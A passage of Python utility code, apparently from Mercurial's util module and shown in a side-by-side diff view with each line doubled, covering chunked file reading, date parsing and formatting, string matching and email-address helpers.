1718 parent = os.path.dirname(os.path.abspath(name))
1719 if parent == name:
1719 if parent == name:
1720 raise
1720 raise
1721 makedirs(parent, mode, notindexed)
1721 makedirs(parent, mode, notindexed)
1722 try:
1722 try:
1723 makedir(name, notindexed)
1723 makedir(name, notindexed)
1724 except OSError as err:
1724 except OSError as err:
1725 # Catch EEXIST to handle races
1725 # Catch EEXIST to handle races
1726 if err.errno == errno.EEXIST:
1726 if err.errno == errno.EEXIST:
1727 return
1727 return
1728 raise
1728 raise
1729 if mode is not None:
1729 if mode is not None:
1730 os.chmod(name, mode)
1730 os.chmod(name, mode)
1731
1731
1732 def readfile(path):
1732 def readfile(path):
1733 with open(path, 'rb') as fp:
1733 with open(path, 'rb') as fp:
1734 return fp.read()
1734 return fp.read()
1735
1735
1736 def writefile(path, text):
1736 def writefile(path, text):
1737 with open(path, 'wb') as fp:
1737 with open(path, 'wb') as fp:
1738 fp.write(text)
1738 fp.write(text)
1739
1739
1740 def appendfile(path, text):
1740 def appendfile(path, text):
1741 with open(path, 'ab') as fp:
1741 with open(path, 'ab') as fp:
1742 fp.write(text)
1742 fp.write(text)
1743
1743
1744 class chunkbuffer(object):
1744 class chunkbuffer(object):
1745 """Allow arbitrary sized chunks of data to be efficiently read from an
1745 """Allow arbitrary sized chunks of data to be efficiently read from an
1746 iterator over chunks of arbitrary size."""
1746 iterator over chunks of arbitrary size."""
1747
1747
1748 def __init__(self, in_iter):
1748 def __init__(self, in_iter):
1749 """in_iter is the iterator that's iterating over the input chunks."""
1749 """in_iter is the iterator that's iterating over the input chunks."""
1750 def splitbig(chunks):
1750 def splitbig(chunks):
1751 for chunk in chunks:
1751 for chunk in chunks:
1752 if len(chunk) > 2**20:
1752 if len(chunk) > 2**20:
1753 pos = 0
1753 pos = 0
1754 while pos < len(chunk):
1754 while pos < len(chunk):
1755 end = pos + 2 ** 18
1755 end = pos + 2 ** 18
1756 yield chunk[pos:end]
1756 yield chunk[pos:end]
1757 pos = end
1757 pos = end
1758 else:
1758 else:
1759 yield chunk
1759 yield chunk
1760 self.iter = splitbig(in_iter)
1760 self.iter = splitbig(in_iter)
1761 self._queue = collections.deque()
1761 self._queue = collections.deque()
1762 self._chunkoffset = 0
1762 self._chunkoffset = 0
1763
1763
1764 def read(self, l=None):
1764 def read(self, l=None):
1765 """Read L bytes of data from the iterator of chunks of data.
1765 """Read L bytes of data from the iterator of chunks of data.
1766 Returns less than L bytes if the iterator runs dry.
1766 Returns less than L bytes if the iterator runs dry.
1767
1767
1768 If size parameter is omitted, read everything"""
1768 If size parameter is omitted, read everything"""
1769 if l is None:
1769 if l is None:
1770 return ''.join(self.iter)
1770 return ''.join(self.iter)
1771
1771
1772 left = l
1772 left = l
1773 buf = []
1773 buf = []
1774 queue = self._queue
1774 queue = self._queue
1775 while left > 0:
1775 while left > 0:
1776 # refill the queue
1776 # refill the queue
1777 if not queue:
1777 if not queue:
1778 target = 2**18
1778 target = 2**18
1779 for chunk in self.iter:
1779 for chunk in self.iter:
1780 queue.append(chunk)
1780 queue.append(chunk)
1781 target -= len(chunk)
1781 target -= len(chunk)
1782 if target <= 0:
1782 if target <= 0:
1783 break
1783 break
1784 if not queue:
1784 if not queue:
1785 break
1785 break
1786
1786
1787 # The easy way to do this would be to queue.popleft(), modify the
1787 # The easy way to do this would be to queue.popleft(), modify the
1788 # chunk (if necessary), then queue.appendleft(). However, for cases
1788 # chunk (if necessary), then queue.appendleft(). However, for cases
1789 # where we read partial chunk content, this incurs 2 dequeue
1789 # where we read partial chunk content, this incurs 2 dequeue
1790 # mutations and creates a new str for the remaining chunk in the
1790 # mutations and creates a new str for the remaining chunk in the
1791 # queue. Our code below avoids this overhead.
1791 # queue. Our code below avoids this overhead.
1792
1792
1793 chunk = queue[0]
1793 chunk = queue[0]
1794 chunkl = len(chunk)
1794 chunkl = len(chunk)
1795 offset = self._chunkoffset
1795 offset = self._chunkoffset
1796
1796
1797 # Use full chunk.
1797 # Use full chunk.
1798 if offset == 0 and left >= chunkl:
1798 if offset == 0 and left >= chunkl:
1799 left -= chunkl
1799 left -= chunkl
1800 queue.popleft()
1800 queue.popleft()
1801 buf.append(chunk)
1801 buf.append(chunk)
1802 # self._chunkoffset remains at 0.
1802 # self._chunkoffset remains at 0.
1803 continue
1803 continue
1804
1804
1805 chunkremaining = chunkl - offset
1805 chunkremaining = chunkl - offset
1806
1806
1807 # Use all of unconsumed part of chunk.
1807 # Use all of unconsumed part of chunk.
1808 if left >= chunkremaining:
1808 if left >= chunkremaining:
1809 left -= chunkremaining
1809 left -= chunkremaining
1810 queue.popleft()
1810 queue.popleft()
1811 # offset == 0 is enabled by block above, so this won't merely
1811 # offset == 0 is enabled by block above, so this won't merely
1812 # copy via ``chunk[0:]``.
1812 # copy via ``chunk[0:]``.
1813 buf.append(chunk[offset:])
1813 buf.append(chunk[offset:])
1814 self._chunkoffset = 0
1814 self._chunkoffset = 0
1815
1815
1816 # Partial chunk needed.
1816 # Partial chunk needed.
1817 else:
1817 else:
1818 buf.append(chunk[offset:offset + left])
1818 buf.append(chunk[offset:offset + left])
1819 self._chunkoffset += left
1819 self._chunkoffset += left
1820 left -= chunkremaining
1820 left -= chunkremaining
1821
1821
1822 return ''.join(buf)
1822 return ''.join(buf)
1823
1823
1824 def filechunkiter(f, size=131072, limit=None):
1824 def filechunkiter(f, size=131072, limit=None):
1825 """Create a generator that produces the data in the file size
1825 """Create a generator that produces the data in the file size
1826 (default 131072) bytes at a time, up to optional limit (default is
1826 (default 131072) bytes at a time, up to optional limit (default is
1827 to read all data). Chunks may be less than size bytes if the
1827 to read all data). Chunks may be less than size bytes if the
1828 chunk is the last chunk in the file, or the file is a socket or
1828 chunk is the last chunk in the file, or the file is a socket or
1829 some other type of file that sometimes reads less data than is
1829 some other type of file that sometimes reads less data than is
1830 requested."""
1830 requested."""
1831 assert size >= 0
1831 assert size >= 0
1832 assert limit is None or limit >= 0
1832 assert limit is None or limit >= 0
1833 while True:
1833 while True:
1834 if limit is None:
1834 if limit is None:
1835 nbytes = size
1835 nbytes = size
1836 else:
1836 else:
1837 nbytes = min(limit, size)
1837 nbytes = min(limit, size)
1838 s = nbytes and f.read(nbytes)
1838 s = nbytes and f.read(nbytes)
1839 if not s:
1839 if not s:
1840 break
1840 break
1841 if limit:
1841 if limit:
1842 limit -= len(s)
1842 limit -= len(s)
1843 yield s
1843 yield s
1844
1844
1845 def makedate(timestamp=None):
1845 def makedate(timestamp=None):
1846 '''Return a unix timestamp (or the current time) as a (unixtime,
1846 '''Return a unix timestamp (or the current time) as a (unixtime,
1847 offset) tuple based off the local timezone.'''
1847 offset) tuple based off the local timezone.'''
1848 if timestamp is None:
1848 if timestamp is None:
1849 timestamp = time.time()
1849 timestamp = time.time()
1850 if timestamp < 0:
1850 if timestamp < 0:
1851 hint = _("check your clock")
1851 hint = _("check your clock")
1852 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1852 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1853 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1853 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1854 datetime.datetime.fromtimestamp(timestamp))
1854 datetime.datetime.fromtimestamp(timestamp))
1855 tz = delta.days * 86400 + delta.seconds
1855 tz = delta.days * 86400 + delta.seconds
1856 return timestamp, tz
1856 return timestamp, tz
1857
1857
1858 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1858 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1859 """represent a (unixtime, offset) tuple as a localized time.
1859 """represent a (unixtime, offset) tuple as a localized time.
1860 unixtime is seconds since the epoch, and offset is the time zone's
1860 unixtime is seconds since the epoch, and offset is the time zone's
1861 number of seconds away from UTC.
1861 number of seconds away from UTC.
1862
1862
1863 >>> datestr((0, 0))
1863 >>> datestr((0, 0))
1864 'Thu Jan 01 00:00:00 1970 +0000'
1864 'Thu Jan 01 00:00:00 1970 +0000'
1865 >>> datestr((42, 0))
1865 >>> datestr((42, 0))
1866 'Thu Jan 01 00:00:42 1970 +0000'
1866 'Thu Jan 01 00:00:42 1970 +0000'
1867 >>> datestr((-42, 0))
1867 >>> datestr((-42, 0))
1868 'Wed Dec 31 23:59:18 1969 +0000'
1868 'Wed Dec 31 23:59:18 1969 +0000'
1869 >>> datestr((0x7fffffff, 0))
1869 >>> datestr((0x7fffffff, 0))
1870 'Tue Jan 19 03:14:07 2038 +0000'
1870 'Tue Jan 19 03:14:07 2038 +0000'
1871 >>> datestr((-0x80000000, 0))
1871 >>> datestr((-0x80000000, 0))
1872 'Fri Dec 13 20:45:52 1901 +0000'
1872 'Fri Dec 13 20:45:52 1901 +0000'
1873 """
1873 """
1874 t, tz = date or makedate()
1874 t, tz = date or makedate()
1875 if "%1" in format or "%2" in format or "%z" in format:
1875 if "%1" in format or "%2" in format or "%z" in format:
1876 sign = (tz > 0) and "-" or "+"
1876 sign = (tz > 0) and "-" or "+"
1877 minutes = abs(tz) // 60
1877 minutes = abs(tz) // 60
1878 q, r = divmod(minutes, 60)
1878 q, r = divmod(minutes, 60)
1879 format = format.replace("%z", "%1%2")
1879 format = format.replace("%z", "%1%2")
1880 format = format.replace("%1", "%c%02d" % (sign, q))
1880 format = format.replace("%1", "%c%02d" % (sign, q))
1881 format = format.replace("%2", "%02d" % r)
1881 format = format.replace("%2", "%02d" % r)
1882 d = t - tz
1882 d = t - tz
1883 if d > 0x7fffffff:
1883 if d > 0x7fffffff:
1884 d = 0x7fffffff
1884 d = 0x7fffffff
1885 elif d < -0x80000000:
1885 elif d < -0x80000000:
1886 d = -0x80000000
1886 d = -0x80000000
1887 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
1887 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
1888 # because they use the gmtime() system call which is buggy on Windows
1888 # because they use the gmtime() system call which is buggy on Windows
1889 # for negative values.
1889 # for negative values.
1890 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
1890 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
1891 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1891 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1892 return s
1892 return s
1893
1893
1894 def shortdate(date=None):
1894 def shortdate(date=None):
1895 """turn (timestamp, tzoff) tuple into iso 8631 date."""
1895 """turn (timestamp, tzoff) tuple into iso 8631 date."""
1896 return datestr(date, format='%Y-%m-%d')
1896 return datestr(date, format='%Y-%m-%d')
1897
1897
1898 def parsetimezone(s):
1898 def parsetimezone(s):
1899 """find a trailing timezone, if any, in string, and return a
1899 """find a trailing timezone, if any, in string, and return a
1900 (offset, remainder) pair"""
1900 (offset, remainder) pair"""
1901
1901
1902 if s.endswith("GMT") or s.endswith("UTC"):
1902 if s.endswith("GMT") or s.endswith("UTC"):
1903 return 0, s[:-3].rstrip()
1903 return 0, s[:-3].rstrip()
1904
1904
1905 # Unix-style timezones [+-]hhmm
1905 # Unix-style timezones [+-]hhmm
1906 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
1906 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
1907 sign = (s[-5] == "+") and 1 or -1
1907 sign = (s[-5] == "+") and 1 or -1
1908 hours = int(s[-4:-2])
1908 hours = int(s[-4:-2])
1909 minutes = int(s[-2:])
1909 minutes = int(s[-2:])
1910 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
1910 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
1911
1911
1912 # ISO8601 trailing Z
1912 # ISO8601 trailing Z
1913 if s.endswith("Z") and s[-2:-1].isdigit():
1913 if s.endswith("Z") and s[-2:-1].isdigit():
1914 return 0, s[:-1]
1914 return 0, s[:-1]
1915
1915
1916 # ISO8601-style [+-]hh:mm
1916 # ISO8601-style [+-]hh:mm
1917 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
1917 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
1918 s[-5:-3].isdigit() and s[-2:].isdigit()):
1918 s[-5:-3].isdigit() and s[-2:].isdigit()):
1919 sign = (s[-6] == "+") and 1 or -1
1919 sign = (s[-6] == "+") and 1 or -1
1920 hours = int(s[-5:-3])
1920 hours = int(s[-5:-3])
1921 minutes = int(s[-2:])
1921 minutes = int(s[-2:])
1922 return -sign * (hours * 60 + minutes) * 60, s[:-6]
1922 return -sign * (hours * 60 + minutes) * 60, s[:-6]
1923
1923
1924 return None, s
1924 return None, s
1925
1925
1926 def strdate(string, format, defaults=None):
1926 def strdate(string, format, defaults=None):
1927 """parse a localized time string and return a (unixtime, offset) tuple.
1927 """parse a localized time string and return a (unixtime, offset) tuple.
1928 if the string cannot be parsed, ValueError is raised."""
1928 if the string cannot be parsed, ValueError is raised."""
1929 if defaults is None:
1929 if defaults is None:
1930 defaults = {}
1930 defaults = {}
1931
1931
1932 # NOTE: unixtime = localunixtime + offset
1932 # NOTE: unixtime = localunixtime + offset
1933 offset, date = parsetimezone(string)
1933 offset, date = parsetimezone(string)
1934
1934
1935 # add missing elements from defaults
1935 # add missing elements from defaults
1936 usenow = False # default to using biased defaults
1936 usenow = False # default to using biased defaults
1937 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
1937 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
1938 part = pycompat.bytestr(part)
1938 part = pycompat.bytestr(part)
1939 found = [True for p in part if ("%"+p) in format]
1939 found = [True for p in part if ("%"+p) in format]
1940 if not found:
1940 if not found:
1941 date += "@" + defaults[part][usenow]
1941 date += "@" + defaults[part][usenow]
1942 format += "@%" + part[0]
1942 format += "@%" + part[0]
1943 else:
1943 else:
1944 # We've found a specific time element, less specific time
1944 # We've found a specific time element, less specific time
1945 # elements are relative to today
1945 # elements are relative to today
1946 usenow = True
1946 usenow = True
1947
1947
1948 timetuple = time.strptime(encoding.strfromlocal(date),
1948 timetuple = time.strptime(encoding.strfromlocal(date),
1949 encoding.strfromlocal(format))
1949 encoding.strfromlocal(format))
1950 localunixtime = int(calendar.timegm(timetuple))
1950 localunixtime = int(calendar.timegm(timetuple))
1951 if offset is None:
1951 if offset is None:
1952 # local timezone
1952 # local timezone
1953 unixtime = int(time.mktime(timetuple))
1953 unixtime = int(time.mktime(timetuple))
1954 offset = unixtime - localunixtime
1954 offset = unixtime - localunixtime
1955 else:
1955 else:
1956 unixtime = localunixtime + offset
1956 unixtime = localunixtime + offset
1957 return unixtime, offset
1957 return unixtime, offset
1958
1958
1959 def parsedate(date, formats=None, bias=None):
1959 def parsedate(date, formats=None, bias=None):
1960 """parse a localized date/time and return a (unixtime, offset) tuple.
1960 """parse a localized date/time and return a (unixtime, offset) tuple.
1961
1961
1962 The date may be a "unixtime offset" string or in one of the specified
1962 The date may be a "unixtime offset" string or in one of the specified
1963 formats. If the date already is a (unixtime, offset) tuple, it is returned.
1963 formats. If the date already is a (unixtime, offset) tuple, it is returned.
1964
1964
1965 >>> parsedate(' today ') == parsedate(\
1965 >>> parsedate(' today ') == parsedate(\
1966 datetime.date.today().strftime('%b %d'))
1966 datetime.date.today().strftime('%b %d'))
1967 True
1967 True
1968 >>> parsedate( 'yesterday ') == parsedate((datetime.date.today() -\
1968 >>> parsedate( 'yesterday ') == parsedate((datetime.date.today() -\
1969 datetime.timedelta(days=1)\
1969 datetime.timedelta(days=1)\
1970 ).strftime('%b %d'))
1970 ).strftime('%b %d'))
1971 True
1971 True
1972 >>> now, tz = makedate()
1972 >>> now, tz = makedate()
1973 >>> strnow, strtz = parsedate('now')
1973 >>> strnow, strtz = parsedate('now')
1974 >>> (strnow - now) < 1
1974 >>> (strnow - now) < 1
1975 True
1975 True
1976 >>> tz == strtz
1976 >>> tz == strtz
1977 True
1977 True
1978 """
1978 """
1979 if bias is None:
1979 if bias is None:
1980 bias = {}
1980 bias = {}
1981 if not date:
1981 if not date:
1982 return 0, 0
1982 return 0, 0
1983 if isinstance(date, tuple) and len(date) == 2:
1983 if isinstance(date, tuple) and len(date) == 2:
1984 return date
1984 return date
1985 if not formats:
1985 if not formats:
1986 formats = defaultdateformats
1986 formats = defaultdateformats
1987 date = date.strip()
1987 date = date.strip()
1988
1988
1989 if date == 'now' or date == _('now'):
1989 if date == 'now' or date == _('now'):
1990 return makedate()
1990 return makedate()
1991 if date == 'today' or date == _('today'):
1991 if date == 'today' or date == _('today'):
1992 date = datetime.date.today().strftime('%b %d')
1992 date = datetime.date.today().strftime('%b %d')
1993 elif date == 'yesterday' or date == _('yesterday'):
1993 elif date == 'yesterday' or date == _('yesterday'):
1994 date = (datetime.date.today() -
1994 date = (datetime.date.today() -
1995 datetime.timedelta(days=1)).strftime('%b %d')
1995 datetime.timedelta(days=1)).strftime('%b %d')
1996
1996
1997 try:
1997 try:
1998 when, offset = map(int, date.split(' '))
1998 when, offset = map(int, date.split(' '))
1999 except ValueError:
1999 except ValueError:
2000 # fill out defaults
2000 # fill out defaults
2001 now = makedate()
2001 now = makedate()
2002 defaults = {}
2002 defaults = {}
2003 for part in ("d", "mb", "yY", "HI", "M", "S"):
2003 for part in ("d", "mb", "yY", "HI", "M", "S"):
2004 # this piece is for rounding the specific end of unknowns
2004 # this piece is for rounding the specific end of unknowns
2005 b = bias.get(part)
2005 b = bias.get(part)
2006 if b is None:
2006 if b is None:
2007 if part[0:1] in "HMS":
2007 if part[0:1] in "HMS":
2008 b = "00"
2008 b = "00"
2009 else:
2009 else:
2010 b = "0"
2010 b = "0"
2011
2011
2012 # this piece is for matching the generic end to today's date
2012 # this piece is for matching the generic end to today's date
2013 n = datestr(now, "%" + part[0:1])
2013 n = datestr(now, "%" + part[0:1])
2014
2014
2015 defaults[part] = (b, n)
2015 defaults[part] = (b, n)
2016
2016
2017 for format in formats:
2017 for format in formats:
2018 try:
2018 try:
2019 when, offset = strdate(date, format, defaults)
2019 when, offset = strdate(date, format, defaults)
2020 except (ValueError, OverflowError):
2020 except (ValueError, OverflowError):
2021 pass
2021 pass
2022 else:
2022 else:
2023 break
2023 break
2024 else:
2024 else:
2025 raise error.ParseError(_('invalid date: %r') % date)
2025 raise error.ParseError(_('invalid date: %r') % date)
2026 # validate explicit (probably user-specified) date and
2026 # validate explicit (probably user-specified) date and
2027 # time zone offset. values must fit in signed 32 bits for
2027 # time zone offset. values must fit in signed 32 bits for
2028 # current 32-bit linux runtimes. timezones go from UTC-12
2028 # current 32-bit linux runtimes. timezones go from UTC-12
2029 # to UTC+14
2029 # to UTC+14
2030 if when < -0x80000000 or when > 0x7fffffff:
2030 if when < -0x80000000 or when > 0x7fffffff:
2031 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2031 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2032 if offset < -50400 or offset > 43200:
2032 if offset < -50400 or offset > 43200:
2033 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2033 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2034 return when, offset
2034 return when, offset
2035
2035
2036 def matchdate(date):
2036 def matchdate(date):
2037 """Return a function that matches a given date match specifier
2037 """Return a function that matches a given date match specifier
2038
2038
2039 Formats include:
2039 Formats include:
2040
2040
2041 '{date}' match a given date to the accuracy provided
2041 '{date}' match a given date to the accuracy provided
2042
2042
2043 '<{date}' on or before a given date
2043 '<{date}' on or before a given date
2044
2044
2045 '>{date}' on or after a given date
2045 '>{date}' on or after a given date
2046
2046
2047 >>> p1 = parsedate("10:29:59")
2047 >>> p1 = parsedate("10:29:59")
2048 >>> p2 = parsedate("10:30:00")
2048 >>> p2 = parsedate("10:30:00")
2049 >>> p3 = parsedate("10:30:59")
2049 >>> p3 = parsedate("10:30:59")
2050 >>> p4 = parsedate("10:31:00")
2050 >>> p4 = parsedate("10:31:00")
2051 >>> p5 = parsedate("Sep 15 10:30:00 1999")
2051 >>> p5 = parsedate("Sep 15 10:30:00 1999")
2052 >>> f = matchdate("10:30")
2052 >>> f = matchdate("10:30")
2053 >>> f(p1[0])
2053 >>> f(p1[0])
2054 False
2054 False
2055 >>> f(p2[0])
2055 >>> f(p2[0])
2056 True
2056 True
2057 >>> f(p3[0])
2057 >>> f(p3[0])
2058 True
2058 True
2059 >>> f(p4[0])
2059 >>> f(p4[0])
2060 False
2060 False
2061 >>> f(p5[0])
2061 >>> f(p5[0])
2062 False
2062 False
2063 """
2063 """
2064
2064
2065 def lower(date):
2065 def lower(date):
2066 d = {'mb': "1", 'd': "1"}
2066 d = {'mb': "1", 'd': "1"}
2067 return parsedate(date, extendeddateformats, d)[0]
2067 return parsedate(date, extendeddateformats, d)[0]
2068
2068
2069 def upper(date):
2069 def upper(date):
2070 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2070 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2071 for days in ("31", "30", "29"):
2071 for days in ("31", "30", "29"):
2072 try:
2072 try:
2073 d["d"] = days
2073 d["d"] = days
2074 return parsedate(date, extendeddateformats, d)[0]
2074 return parsedate(date, extendeddateformats, d)[0]
2075 except Abort:
2075 except Abort:
2076 pass
2076 pass
2077 d["d"] = "28"
2077 d["d"] = "28"
2078 return parsedate(date, extendeddateformats, d)[0]
2078 return parsedate(date, extendeddateformats, d)[0]
2079
2079
2080 date = date.strip()
2080 date = date.strip()
2081
2081
2082 if not date:
2082 if not date:
2083 raise Abort(_("dates cannot consist entirely of whitespace"))
2083 raise Abort(_("dates cannot consist entirely of whitespace"))
2084 elif date[0] == "<":
2084 elif date[0] == "<":
2085 if not date[1:]:
2085 if not date[1:]:
2086 raise Abort(_("invalid day spec, use '<DATE'"))
2086 raise Abort(_("invalid day spec, use '<DATE'"))
2087 when = upper(date[1:])
2087 when = upper(date[1:])
2088 return lambda x: x <= when
2088 return lambda x: x <= when
2089 elif date[0] == ">":
2089 elif date[0] == ">":
2090 if not date[1:]:
2090 if not date[1:]:
2091 raise Abort(_("invalid day spec, use '>DATE'"))
2091 raise Abort(_("invalid day spec, use '>DATE'"))
2092 when = lower(date[1:])
2092 when = lower(date[1:])
2093 return lambda x: x >= when
2093 return lambda x: x >= when
2094 elif date[0] == "-":
2094 elif date[0] == "-":
2095 try:
2095 try:
2096 days = int(date[1:])
2096 days = int(date[1:])
2097 except ValueError:
2097 except ValueError:
2098 raise Abort(_("invalid day spec: %s") % date[1:])
2098 raise Abort(_("invalid day spec: %s") % date[1:])
2099 if days < 0:
2099 if days < 0:
2100 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2100 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2101 % date[1:])
2101 % date[1:])
2102 when = makedate()[0] - days * 3600 * 24
2102 when = makedate()[0] - days * 3600 * 24
2103 return lambda x: x >= when
2103 return lambda x: x >= when
2104 elif " to " in date:
2104 elif " to " in date:
2105 a, b = date.split(" to ")
2105 a, b = date.split(" to ")
2106 start, stop = lower(a), upper(b)
2106 start, stop = lower(a), upper(b)
2107 return lambda x: x >= start and x <= stop
2107 return lambda x: x >= start and x <= stop
2108 else:
2108 else:
2109 start, stop = lower(date), upper(date)
2109 start, stop = lower(date), upper(date)
2110 return lambda x: x >= start and x <= stop
2110 return lambda x: x >= start and x <= stop
2111
2111
2112 def stringmatcher(pattern, casesensitive=True):
2112 def stringmatcher(pattern, casesensitive=True):
2113 """
2113 """
2114 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2114 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2115 returns the matcher name, pattern, and matcher function.
2115 returns the matcher name, pattern, and matcher function.
2116 missing or unknown prefixes are treated as literal matches.
2116 missing or unknown prefixes are treated as literal matches.
2117
2117
2118 helper for tests:
2118 helper for tests:
2119 >>> def test(pattern, *tests):
2119 >>> def test(pattern, *tests):
2120 ... kind, pattern, matcher = stringmatcher(pattern)
2120 ... kind, pattern, matcher = stringmatcher(pattern)
2121 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2121 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2122 >>> def itest(pattern, *tests):
2122 >>> def itest(pattern, *tests):
2123 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2123 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2124 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2124 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2125
2125
2126 exact matching (no prefix):
2126 exact matching (no prefix):
2127 >>> test('abcdefg', 'abc', 'def', 'abcdefg')
2127 >>> test('abcdefg', 'abc', 'def', 'abcdefg')
2128 ('literal', 'abcdefg', [False, False, True])
2128 ('literal', 'abcdefg', [False, False, True])
2129
2129
2130 regex matching ('re:' prefix)
2130 regex matching ('re:' prefix)
2131 >>> test('re:a.+b', 'nomatch', 'fooadef', 'fooadefbar')
2131 >>> test('re:a.+b', 'nomatch', 'fooadef', 'fooadefbar')
2132 ('re', 'a.+b', [False, False, True])
2132 ('re', 'a.+b', [False, False, True])
2133
2133
2134 force exact matches ('literal:' prefix)
2134 force exact matches ('literal:' prefix)
2135 >>> test('literal:re:foobar', 'foobar', 're:foobar')
2135 >>> test('literal:re:foobar', 'foobar', 're:foobar')
2136 ('literal', 're:foobar', [False, True])
2136 ('literal', 're:foobar', [False, True])
2137
2137
2138 unknown prefixes are ignored and treated as literals
2138 unknown prefixes are ignored and treated as literals
2139 >>> test('foo:bar', 'foo', 'bar', 'foo:bar')
2139 >>> test('foo:bar', 'foo', 'bar', 'foo:bar')
2140 ('literal', 'foo:bar', [False, False, True])
2140 ('literal', 'foo:bar', [False, False, True])
2141
2141
2142 case insensitive regex matches
2142 case insensitive regex matches
2143 >>> itest('re:A.+b', 'nomatch', 'fooadef', 'fooadefBar')
2143 >>> itest('re:A.+b', 'nomatch', 'fooadef', 'fooadefBar')
2144 ('re', 'A.+b', [False, False, True])
2144 ('re', 'A.+b', [False, False, True])
2145
2145
2146 case insensitive literal matches
2146 case insensitive literal matches
2147 >>> itest('ABCDEFG', 'abc', 'def', 'abcdefg')
2147 >>> itest('ABCDEFG', 'abc', 'def', 'abcdefg')
2148 ('literal', 'ABCDEFG', [False, False, True])
2148 ('literal', 'ABCDEFG', [False, False, True])
2149 """
2149 """
2150 if pattern.startswith('re:'):
2150 if pattern.startswith('re:'):
2151 pattern = pattern[3:]
2151 pattern = pattern[3:]
2152 try:
2152 try:
2153 flags = 0
2153 flags = 0
2154 if not casesensitive:
2154 if not casesensitive:
2155 flags = remod.I
2155 flags = remod.I
2156 regex = remod.compile(pattern, flags)
2156 regex = remod.compile(pattern, flags)
2157 except remod.error as e:
2157 except remod.error as e:
2158 raise error.ParseError(_('invalid regular expression: %s')
2158 raise error.ParseError(_('invalid regular expression: %s')
2159 % e)
2159 % e)
2160 return 're', pattern, regex.search
2160 return 're', pattern, regex.search
2161 elif pattern.startswith('literal:'):
2161 elif pattern.startswith('literal:'):
2162 pattern = pattern[8:]
2162 pattern = pattern[8:]
2163
2163
2164 match = pattern.__eq__
2164 match = pattern.__eq__
2165
2165
2166 if not casesensitive:
2166 if not casesensitive:
2167 ipat = encoding.lower(pattern)
2167 ipat = encoding.lower(pattern)
2168 match = lambda s: ipat == encoding.lower(s)
2168 match = lambda s: ipat == encoding.lower(s)
2169 return 'literal', pattern, match
2169 return 'literal', pattern, match
2170
2170
2171 def shortuser(user):
2171 def shortuser(user):
2172 """Return a short representation of a user name or email address."""
2172 """Return a short representation of a user name or email address."""
2173 f = user.find('@')
2173 f = user.find('@')
2174 if f >= 0:
2174 if f >= 0:
2175 user = user[:f]
2175 user = user[:f]
2176 f = user.find('<')
2176 f = user.find('<')
2177 if f >= 0:
2177 if f >= 0:
2178 user = user[f + 1:]
2178 user = user[f + 1:]
2179 f = user.find(' ')
2179 f = user.find(' ')
2180 if f >= 0:
2180 if f >= 0:
2181 user = user[:f]
2181 user = user[:f]
2182 f = user.find('.')
2182 f = user.find('.')
2183 if f >= 0:
2183 if f >= 0:
2184 user = user[:f]
2184 user = user[:f]
2185 return user
2185 return user
2186
2186
2187 def emailuser(user):
2187 def emailuser(user):
2188 """Return the user portion of an email address."""
2188 """Return the user portion of an email address."""
2189 f = user.find('@')
2189 f = user.find('@')
2190 if f >= 0:
2190 if f >= 0:
2191 user = user[:f]
2191 user = user[:f]
2192 f = user.find('<')
2192 f = user.find('<')
2193 if f >= 0:
2193 if f >= 0:
2194 user = user[f + 1:]
2194 user = user[f + 1:]
2195 return user
2195 return user
2196
2196
2197 def email(author):
2197 def email(author):
2198 '''get email of author.'''
2198 '''get email of author.'''
2199 r = author.find('>')
2199 r = author.find('>')
2200 if r == -1:
2200 if r == -1:
2201 r = None
2201 r = None
2202 return author[author.find('<') + 1:r]
2202 return author[author.find('<') + 1:r]
2203
2203
2204 def ellipsis(text, maxlength=400):
2204 def ellipsis(text, maxlength=400):
2205 """Trim string to at most maxlength (default: 400) columns in display."""
2205 """Trim string to at most maxlength (default: 400) columns in display."""
2206 return encoding.trim(text, maxlength, ellipsis='...')
2206 return encoding.trim(text, maxlength, ellipsis='...')
2207
2207
2208 def unitcountfn(*unittable):
2208 def unitcountfn(*unittable):
2209 '''return a function that renders a readable count of some quantity'''
2209 '''return a function that renders a readable count of some quantity'''
2210
2210
2211 def go(count):
2211 def go(count):
2212 for multiplier, divisor, format in unittable:
2212 for multiplier, divisor, format in unittable:
2213 if abs(count) >= divisor * multiplier:
2213 if abs(count) >= divisor * multiplier:
2214 return format % (count / float(divisor))
2214 return format % (count / float(divisor))
2215 return unittable[-1][2] % count
2215 return unittable[-1][2] % count
2216
2216
2217 return go
2217 return go
2218
2218
2219 def processlinerange(fromline, toline):
2219 def processlinerange(fromline, toline):
